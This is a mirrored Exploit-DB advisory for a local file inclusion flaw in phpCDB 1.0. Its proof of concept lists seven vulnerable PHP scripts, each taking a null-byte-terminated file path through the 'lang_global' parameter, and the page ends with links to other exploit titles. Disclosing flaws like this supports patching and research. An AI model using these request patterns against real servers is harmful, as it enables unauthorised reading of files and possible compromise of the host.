phpCDB 1.0 – Local File Inclusion

Exploit Database
38 阅读

作者： cr4wl3r

日期： 2010-02-27
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11585/

##############################################################
##phpCDB <= 1.0 Local File Include Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
Download: http://sourceforge.net/projects/phpcdb/files/
##############################################################
PoC:
 [phpcdb_path]/firstvisit.php?lang_global=[LFI%00]
 [phpcdb_path]/newfolder.php?lang_global=[LFI%00]
 [phpcdb_path]/showfolders.php?lang_global=[LFI%00]
 [phpcdb_path]/newlang.php?lang_global=[LFI%00]
 [phpcdb_path]/showinnerfolder.php?lang_global=[LFI%00]
 [phpcdb_path]/writecode.php?lang_global=[LFI%00]
 [phpcdb_path]/showcode.php?lang_global=[LFI%00]
##############################################################txt

last Exploits
phpCDB 1.0 – Local File Inclusion的更多信息

ActivDesk 3.0 – Multiple Vulnerabilities：
Cacti 1.2.24 – Authenticated command injection when using SNMP options：
ResourceSpace 8.6 – ‘watched_searches.php’ SQL Injection：
XOOPS – ‘view_photos.php’ Cross-Site Scripting：
iBrowser Plugin 1.4.1 – ‘lang’ Local File Inclusion：
Oracle Java SE – Web Start jnlp XML External Entity Processing Information Disclosure：
TFTgallery 0.13.1 – Local File Inclusion：
EC-CUBE 2.12.6 – Server-Side Request Forgery：